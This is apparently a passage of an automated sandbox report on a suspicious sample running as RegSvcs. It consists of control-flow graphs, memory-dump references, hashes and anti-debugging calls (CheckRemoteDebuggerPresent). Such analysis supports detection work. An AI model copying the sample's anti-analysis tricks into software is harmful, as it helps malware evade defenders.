937->898 937->922 950 670b543-670b56b 938->950 951 670b668-670b66d 938->951 944->935 944->936 945->944 953 670b86a-670b960 call 67097d8 945->953 950->951 958 670b571-670b59f 950->958 951->937 1002 670b962-670b96c 953->1002 1003 670b96e 953->1003 958->951 964 670b5a5-670b5ae 958->964 964->951 966 670b5b4-670b5e6 964->966 973 670b5f1-670b60d 966->973 974 670b5e8-670b5ec 966->974 973->937 976 670b60f-670b666 call 67097d8 973->976 974->951 975 670b5ee 974->975 975->973 976->937 1004 670b973-670b975 1002->1004 1003->1004 1004->944 1005 670b977-670b97c 1004->1005 1006 670b98a 1005->1006 1007 670b97e-670b988 1005->1007 1008 670b98f-670b991 1006->1008 1007->1008 1008->944 1009 670b993-670b99f 1008->1009 1009->944
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q
                                                                • API String ID: 0-355816377
                                                                • Opcode ID: 386b1535e3758a515d25c7ae8ee58c10645f8d2c9396a747436d3be8901242f6
                                                                • Instruction ID: bdd4e149c8ce209d06ba9a8295f759c3db52a20c37e90144bdf116b553b81c95
                                                                • Opcode Fuzzy Hash: 386b1535e3758a515d25c7ae8ee58c10645f8d2c9396a747436d3be8901242f6
                                                                • Instruction Fuzzy Hash: 9F02B030B00205DFEB54DB74D590A6EB7E2EF84704F148529D40ADB795EB32EE86CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 22b7e1983b0cc95ceba0bf123c5ea6a1ea42782ce7623fccbf1118c3f6f4c859
                                                                • Instruction ID: 810f2f6ca2a95bb79ddf8779af608cbb4ac65c96552f27460fe957f841454c3f
                                                                • Opcode Fuzzy Hash: 22b7e1983b0cc95ceba0bf123c5ea6a1ea42782ce7623fccbf1118c3f6f4c859
                                                                • Instruction Fuzzy Hash: 6A63E931D10B1A8ADB11EF68C8945A9F7B1FF99300F15D79AE45877221EB70AAC4CF81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3962dfc006a34eed05f0516f85209d08a08cf466ff7b5eed4f326dee9585e53
                                                                • Instruction ID: d21becb41ef97baafcc7ff27d6e2837cb9bb4f56f2918bee50020201b563ba77
                                                                • Opcode Fuzzy Hash: e3962dfc006a34eed05f0516f85209d08a08cf466ff7b5eed4f326dee9585e53
                                                                • Instruction Fuzzy Hash: 31331D31D1071ACEDB11EF68C8805ADF7B1FF99300F15C69AE458A7261EB70AAC5CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1959 e57ec8-e57f4c CheckRemoteDebuggerPresent 1961 e57f55-e57f90 1959->1961 1962 e57f4e-e57f54 1959->1962 1962->1961
                                                                APIs
                                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E57F3F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4134463929.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e50000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: CheckDebuggerPresentRemote
                                                                • String ID:
                                                                • API String ID: 3662101638-0
                                                                • Opcode ID: 70b3fcbded1e7e1b14d1dfa60a3be24415ae3b09a36e76ab5fb40502a4f30a44
                                                                • Instruction ID: 253f48815f1f837bc8b3245b2081221dec1eb3b8298516a9c36d3440c1638489
                                                                • Opcode Fuzzy Hash: 70b3fcbded1e7e1b14d1dfa60a3be24415ae3b09a36e76ab5fb40502a4f30a44
                                                                • Instruction Fuzzy Hash: 1A2125B29002598FCB10CF9AD484BEEBBF4AF49320F14846AE859A7250D778A944CF65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2b3b475bbe386babc02bdf61c2e4dd63e509278b2454a0cdafc208b44cec15e4
                                                                • Instruction ID: 1c06113c155cd67030c5a0f9c672b9b509cb7430bf6c3658401d389cfbbe2da9
                                                                • Opcode Fuzzy Hash: 2b3b475bbe386babc02bdf61c2e4dd63e509278b2454a0cdafc208b44cec15e4
                                                                • Instruction Fuzzy Hash: D4924734A00204CFEB64DB68C694A6DB7F2FF45314F5584AAD449AB3A1DB35EC85CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e318ae0089a58bfba123cff5801cd85a0f45e25808ebffe7bd421646053c6d3
                                                                • Instruction ID: ad1bdd75a4207575b05d65c2224620c224467103812c2c3aaffd74bb430fca28
                                                                • Opcode Fuzzy Hash: 5e318ae0089a58bfba123cff5801cd85a0f45e25808ebffe7bd421646053c6d3
                                                                • Instruction Fuzzy Hash: 9112D171F10205DBEF64DB64D8806BEB7E6EB85310F248429D85ADB385DB34DC46CBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7698b1957f1a5ad6edb00c8a8f01210f7bc0e41a2b34653e3a6d14534dd76197
                                                                • Instruction ID: aa1085cd82498a40aa2c0d42b6aaddc09942e28c8596c5be3fb94c91cfd4a5af
                                                                • Opcode Fuzzy Hash: 7698b1957f1a5ad6edb00c8a8f01210f7bc0e41a2b34653e3a6d14534dd76197
                                                                • Instruction Fuzzy Hash: FD225E30E10209CFEFA4DB68D5807BEB7E6EB85310F248826E409DB3D5CA35DC858B61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 670e310-670e32e 1 670e330-670e333 0->1 2 670e335-670e33a 1->2 3 670e33d-670e340 1->3 2->3 4 670e342-670e34f 3->4 5 670e354-670e357 3->5 4->5 6 670e52d-670e536 5->6 7 670e35d-670e360 5->7 9 670e3cc-670e3d5 6->9 10 670e53c-670e546 6->10 11 670e371-670e374 7->11 12 670e362-670e366 7->12 13 670e547-670e55a 9->13 14 670e3db-670e3df 9->14 16 670e376-670e389 11->16 17 670e38e-670e391 11->17 12->10 15 670e36c 12->15 27 670e562-670e57e 13->27 28 670e55c-670e55d 13->28 18 670e3e4-670e3e6 14->18 15->11 16->17 19 670e3a1-670e3a4 17->19 20 670e393-670e39c 17->20 24 670e3e8 18->24 25 670e3ed-670e3f0 18->25 21 670e3a6-670e3c2 19->21 22 670e3c7-670e3ca 19->22 20->19 21->22 22->9 22->18 24->25 25->1 29 670e3f6-670e41a 25->29 31 670e580-670e583 27->31 28->27 43 670e420-670e42f 29->43 44 670e52a 29->44 32 670e590-670e593 31->32 33 670e585-670e589 31->33 37 670e595-670e5b1 32->37 38 670e5b6-670e5b9 32->38 35 670e5e1-670e61c 33->35 36 670e58b 33->36 50 670e622-670e62e 35->50 51 670e80f-670e822 35->51 36->32 37->38 40 670e5c6-670e5c9 38->40 41 670e5bb-670e5c5 38->41 45 670e5d8-670e5db 40->45 46 670e5cb call 670e868 40->46 58 670e431-670e437 43->58 59 670e447-670e482 call 67097d8 43->59 44->6 45->35 49 670e844-670e846 45->49 53 670e5d1-670e5d3 46->53 56 670e848 49->56 57 670e84d-670e850 49->57 64 670e630-670e649 50->64 65 670e64e-670e692 50->65 54 670e824 51->54 53->45 66 670e825 54->66 56->57 57->31 61 670e856-670e860 57->61 62 670e439 58->62 63 670e43b-670e43d 58->63 77 670e484-670e48a 59->77 78 670e49a-670e4b1 59->78 62->59 63->59 64->54 82 670e694-670e6a6 65->82 83 670e6ae-670e6ed 65->83 66->66 80 670e48c 77->80 81 670e48e-670e490 77->81 91 670e4b3-670e4b9 78->91 92 670e4c9-670e4da 78->92 80->78 81->78 82->83 87 670e6f3-670e7ce call 67097d8 83->87 88 670e7d4-670e7e9 83->88 87->88 88->51 95 670e4bb 91->95 96 670e4bd-670e4bf 91->96 99 670e4f2-670e523 92->99 100 670e4dc-670e4e2 92->100 95->92 96->92 99->44 102 670e4e4 100->102 103 670e4e6-670e4e8 100->103 102->99 103->99
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-3823777903
                                                                • Opcode ID: 30cec69e018d3c7bd3df304a7cd1f551eb961a7eafbb47ade5864643c0c0eb43
                                                                • Instruction ID: 770658f831f6c99c7e951d6768e0502806b962b36f2868ab275051074e6d5b09
                                                                • Opcode Fuzzy Hash: 30cec69e018d3c7bd3df304a7cd1f551eb961a7eafbb47ade5864643c0c0eb43
                                                                • Instruction Fuzzy Hash: E2E16F34E10209CFEB65DF68D5946AEB7F2FB85304F148929E405EB395DB30D886CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2392861976
                                                                • Opcode ID: 20947532c7827d7b07c251919506a39ec69ca4dd19d980717ddaf8351295d6f9
                                                                • Instruction ID: 5f4fbb84cddaaefa5d983e3637ff62c9b4598025547d16f17243f9a3c3bb4a2d
                                                                • Opcode Fuzzy Hash: 20947532c7827d7b07c251919506a39ec69ca4dd19d980717ddaf8351295d6f9
                                                                • Instruction Fuzzy Hash: 86026D30E10209CFEBA4DF68D9846ADB7F1FB85314F248926E805DB395DB35D885CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 425 670c790-670c7b5 426 670c7b7-670c7ba 425->426 427 670c7e0-670c7e3 426->427 428 670c7bc-670c7db 426->428 429 670d0a3-670d0a5 427->429 430 670c7e9-670c7fe 427->430 428->427 431 670d0a7 429->431 432 670d0ac-670d0af 429->432 436 670c800-670c806 430->436 437 670c816-670c82c 430->437 431->432 432->426 435 670d0b5-670d0bf 432->435 439 670c808 436->439 440 670c80a-670c80c 436->440 442 670c837-670c839 437->442 439->437 440->437 443 670c851-670c8c2 442->443 444 670c83b-670c841 442->444 455 670c8c4-670c8e7 443->455 456 670c8ee-670c90a 443->456 445 670c843 444->445 446 670c845-670c847 444->446 445->443 446->443 455->456 461 670c936-670c951 456->461 462 670c90c-670c92f 456->462 467 670c953-670c975 461->467 468 670c97c-670c997 461->468 462->461 467->468 473 670c9c2-670c9cc 468->473 474 670c999-670c9bb 468->474 475 670c9dc-670ca56 473->475 476 670c9ce-670c9d7 473->476 474->473 482 670caa3-670cab8 475->482 483 670ca58-670ca76 475->483 476->435 482->429 487 670ca92-670caa1 483->487 488 670ca78-670ca87 483->488 487->482 487->483 488->487
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q
                                                                • API String ID: 0-2125118731
                                                                • Opcode ID: 62a6076bcf16544e48a50640b5242c334b0ba7358e7a595b9077a822a2604b39
                                                                • Instruction ID: 6097211bee6138c916b57722d7ef67f459feda6ff518f9c8dc55983fc0abe8b7
                                                                • Opcode Fuzzy Hash: 62a6076bcf16544e48a50640b5242c334b0ba7358e7a595b9077a822a2604b39
                                                                • Instruction Fuzzy Hash: 6A917130F0020A9FDB55DB65D9507AEB7F6AFC5204F10856AC40DEB788EE70DC468B95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 820 6707dd8-6707dfc 821 6707dfe-6707e01 820->821 822 67084e0-67084e3 821->822 823 6707e07-6707eff 821->823 824 6708504-6708506 822->824 825 67084e5-67084ff 822->825 843 6707f82-6707f89 823->843 844 6707f05-6707f52 call 6708680 823->844 827 6708508 824->827 828 670850d-6708510 824->828 825->824 827->828 828->821 830 6708516-6708523 828->830 845 670800d-6708016 843->845 846 6707f8f-6707fff 843->846 857 6707f58-6707f74 844->857 845->830 863 6708001 846->863 864 670800a 846->864 860 6707f76 857->860 861 6707f7f 857->861 860->861 861->843 863->864 864->845
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$XPcq$\Ocq
                                                                • API String ID: 0-3575482020
                                                                • Opcode ID: b950592ec1e1edcf970422d113d691fcf762e181d388228ffc209256ed9da301
                                                                • Instruction ID: d2b9024c10c516bb59e949099f89469bcc72dab8213fdb71e51e9c43bef7bb9b
                                                                • Opcode Fuzzy Hash: b950592ec1e1edcf970422d113d691fcf762e181d388228ffc209256ed9da301
                                                                • Instruction Fuzzy Hash: 7F618034F002089FEF549FA4C8547AEBAF6EB88300F20842AE506EB395DB759D459B65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1466 670c781-670c782 1467 670c784-670c788 1466->1467 1468 670c78a-670c7b5 1466->1468 1467->1468 1471 670c7b7-670c7ba 1468->1471 1472 670c7e0-670c7e3 1471->1472 1473 670c7bc-670c7db 1471->1473 1474 670d0a3-670d0a5 1472->1474 1475 670c7e9-670c7fe 1472->1475 1473->1472 1476 670d0a7 1474->1476 1477 670d0ac-670d0af 1474->1477 1481 670c800-670c806 1475->1481 1482 670c816-670c82c 1475->1482 1476->1477 1477->1471 1480 670d0b5-670d0bf 1477->1480 1484 670c808 1481->1484 1485 670c80a-670c80c 1481->1485 1487 670c837-670c839 1482->1487 1484->1482 1485->1482 1488 670c851-670c8c2 1487->1488 1489 670c83b-670c841 1487->1489 1500 670c8c4-670c8e7 1488->1500 1501 670c8ee-670c90a 1488->1501 1490 670c843 1489->1490 1491 670c845-670c847 1489->1491 1490->1488 1491->1488 1500->1501 1506 670c936-670c951 1501->1506 1507 670c90c-670c92f 1501->1507 1512 670c953-670c975 1506->1512 1513 670c97c-670c997 1506->1513 1507->1506 1512->1513 1518 670c9c2-670c9cc 1513->1518 1519 670c999-670c9bb 1513->1519 1520 670c9dc-670ca56 1518->1520 1521 670c9ce-670c9d7 1518->1521 1519->1518 1527 670caa3-670cab8 1520->1527 1528 670ca58-670ca76 1520->1528 1521->1480 1527->1474 1532 670ca92-670caa1 1528->1532 1533 670ca78-670ca87 1528->1533 1532->1527 1532->1528 1533->1532
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q
                                                                • API String ID: 0-355816377
                                                                • Opcode ID: 9142955dc90a300ee468a627ce29ad7cb3e004347d54bc2e5ad2b1813464645d
                                                                • Instruction ID: 473811bbc97fd43bbf72aff8d11526e73ff9370f09a597d51220f28a10e30d79
                                                                • Opcode Fuzzy Hash: 9142955dc90a300ee468a627ce29ad7cb3e004347d54bc2e5ad2b1813464645d
                                                                • Instruction Fuzzy Hash: B4518430B001059FEB55DB65DA507BEB7F6EBC8648F10856AC409DB788EE70DC428BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1953 e57ec2-e57f4c CheckRemoteDebuggerPresent 1955 e57f55-e57f90 1953->1955 1956 e57f4e-e57f54 1953->1956 1956->1955
                                                                APIs
                                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E57F3F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4134463929.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_e50000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID: CheckDebuggerPresentRemote
                                                                • String ID:
                                                                • API String ID: 3662101638-0
                                                                • Opcode ID: b2be7bd12d300dd6ac1a06a09d17bc0439862121b41bb1f356a3e20818766492
                                                                • Instruction ID: ccdac7e9637a97aca20129028b246cd77ec2929e1921876dfbfe837cc5f49616
                                                                • Opcode Fuzzy Hash: b2be7bd12d300dd6ac1a06a09d17bc0439862121b41bb1f356a3e20818766492
                                                                • Instruction Fuzzy Hash: FB214AB19002598FCB10CFA9D4847EEBBF4AF49310F14846AE455B7351D7789945CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1965 6707dc9-6707dca 1966 6707dd2-6707dd4 1965->1966 1967 6707dcc-6707dce 1965->1967 1969 6707dd6-6707dfc 1966->1969 1968 6707dd0 1967->1968 1967->1969 1968->1966 1972 6707dfe-6707e01 1969->1972 1973 67084e0-67084e3 1972->1973 1974 6707e07-6707eff 1972->1974 1975 6708504-6708506 1973->1975 1976 67084e5-67084ff 1973->1976 1994 6707f82-6707f89 1974->1994 1995 6707f05-6707f52 call 6708680 1974->1995 1978 6708508 1975->1978 1979 670850d-6708510 1975->1979 1976->1975 1978->1979 1979->1972 1981 6708516-6708523 1979->1981 1996 670800d-6708016 1994->1996 1997 6707f8f-6707fff 1994->1997 2008 6707f58-6707f74 1995->2008 1996->1981 2014 6708001 1997->2014 2015 670800a 1997->2015 2011 6707f76 2008->2011 2012 6707f7f 2008->2012 2011->2012 2012->1994 2014->2015 2015->1996
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XPcq
                                                                • API String ID: 0-714321711
                                                                • Opcode ID: 1f115118b575534d1b1d6c40b92aaedcbfffce00443cbec01385da914e886a2e
                                                                • Instruction ID: 93c173dccba32068f0f3e3e71e1426f91d9e7c02806ccc632c3a8010e0cca78c
                                                                • Opcode Fuzzy Hash: 1f115118b575534d1b1d6c40b92aaedcbfffce00443cbec01385da914e886a2e
                                                                • Instruction Fuzzy Hash: 52418374B002089FEB45DFB4C8547AEBBF6BF88700F20852AE505EB395DA709C459BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2100 6705855-6705858 2101 670585a 2100->2101 2102 670587d-6705883 2100->2102 2104 6705862 2101->2104 2105 670585c-6705861 2101->2105 2103 6705885-6705888 2102->2103 2106 670588a-67058a6 2103->2106 2107 67058ab-67058ad 2103->2107 2108 6705864-6705867 2104->2108 2109 670586a-670587b 2104->2109 2105->2104 2106->2107 2110 67058b4-67058b7 2107->2110 2111 67058af 2107->2111 2108->2109 2109->2102 2110->2103 2113 67058b9-67058df 2110->2113 2111->2110 2118 67058e6-6705914 2113->2118 2123 6705916-6705920 2118->2123 2124 670598b-67059af 2118->2124 2128 6705922-6705928 2123->2128 2129 6705938-6705989 2123->2129 2130 67059b1 2124->2130 2131 67059b9 2124->2131 2132 670592a 2128->2132 2133 670592c-670592e 2128->2133 2129->2123 2129->2124 2130->2131 2135 67059ba 2131->2135 2132->2129 2133->2129 2135->2135
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: d4d987417d2d04c7267f1a4735acd37828d1255b69da78188d7942ee3db8373f
                                                                • Instruction ID: 0b9a17dbcaafbacefa04c1d93d53a8a12e91a6d21541e18f9d18fb219ed1942b
                                                                • Opcode Fuzzy Hash: d4d987417d2d04c7267f1a4735acd37828d1255b69da78188d7942ee3db8373f
                                                                • Instruction Fuzzy Hash: 6831EE70B10205CFFB49AB30D65426EBBE3ABC9220F24856AD406DB3D5DE35CD46CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2141 6705868-6705883 2143 6705885-6705888 2141->2143 2144 670588a-67058a6 2143->2144 2145 67058ab-67058ad 2143->2145 2144->2145 2146 67058b4-67058b7 2145->2146 2147 67058af 2145->2147 2146->2143 2149 67058b9-67058df 2146->2149 2147->2146 2154 67058e6-6705914 2149->2154 2159 6705916-6705920 2154->2159 2160 670598b-67059af 2154->2160 2164 6705922-6705928 2159->2164 2165 6705938-6705989 2159->2165 2166 67059b1 2160->2166 2167 67059b9 2160->2167 2168 670592a 2164->2168 2169 670592c-670592e 2164->2169 2165->2159 2165->2160 2166->2167 2171 67059ba 2167->2171 2168->2165 2169->2165 2171->2171
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 80aca0a30a84116853acda888df8d3728ca3601315f604dcf628a17389fd0a74
                                                                • Instruction ID: 9e2bc3d49398266c19831a77db61f9c0b257aa47897c2e51a7d33da7f9cf1cef
                                                                • Opcode Fuzzy Hash: 80aca0a30a84116853acda888df8d3728ca3601315f604dcf628a17389fd0a74
                                                                • Instruction Fuzzy Hash: EE31DE70B10205CFFB59AB34D65426EBAE3ABC9210F208529D406DB3D5EE35DD46CBE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c3f0556d8c73f7f875a4c9d933d3281ba024426d5e387f3c0bf047eb8c608868
                                                                • Instruction ID: 797bb6062d1aa9211ab338e8fd530de6c7821038e29089c5eb1345d155cbca59
                                                                • Opcode Fuzzy Hash: c3f0556d8c73f7f875a4c9d933d3281ba024426d5e387f3c0bf047eb8c608868
                                                                • Instruction Fuzzy Hash: 19A18E34A00304CFDB64DB68D648A6DB7F2FF84314F558569E41A9B392EB31EC85CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b6e4f95fe7fa997f743cacad6b9122ec6169ae6d0c21bcc7b1ce9e6028cf6db0
                                                                • Instruction ID: be8e170b262d6cf9f4e5afd62cfa3f51236f39d0dc4fb9046df926db204a5bb8
                                                                • Opcode Fuzzy Hash: b6e4f95fe7fa997f743cacad6b9122ec6169ae6d0c21bcc7b1ce9e6028cf6db0
                                                                • Instruction Fuzzy Hash: 65814034B102099FDF48DB78D5546AE77F7AF89304F108429D40ADB395EB30EC8687A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19b309e051f871f26a4a983663ff57fb79372cba3e1397b12b0944047d9938bc
                                                                • Instruction ID: 9632800826e7d339ffc19796cbd1391b238f29299d2e152ddb63f1559ec95946
                                                                • Opcode Fuzzy Hash: 19b309e051f871f26a4a983663ff57fb79372cba3e1397b12b0944047d9938bc
                                                                • Instruction Fuzzy Hash: 3861E171F000214FDF509A7EC88466FEADBAFC4624B15403AE90EDB365DEA6DD0287D2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8bb2c079c36798a2d822181679ab95ca3e23e6abead2ac276bf6bcb3290ba05b
                                                                • Instruction ID: 55c04be1152213b5c63a2153d34839412dbb8fdc0227c1080243237bb934bbf5
                                                                • Opcode Fuzzy Hash: 8bb2c079c36798a2d822181679ab95ca3e23e6abead2ac276bf6bcb3290ba05b
                                                                • Instruction Fuzzy Hash: BE915E34E10219CFDF64DF68C880B9DB7B1FF85310F208699D449AB295EB70AA85CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2520122e648b3a70bf1f6ba76f133b80c699f30e78f89cd6c7956d8459f3d8d2
                                                                • Instruction ID: 0ced88cf115ff8383bb6f7d28eec6e21c207624797ce3d276b0563ee5128089d
                                                                • Opcode Fuzzy Hash: 2520122e648b3a70bf1f6ba76f133b80c699f30e78f89cd6c7956d8459f3d8d2
                                                                • Instruction Fuzzy Hash: 2B912E34E10619CBDF64DF68C880B9DB7B1FF89300F208599D549AB295EB70AA85CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
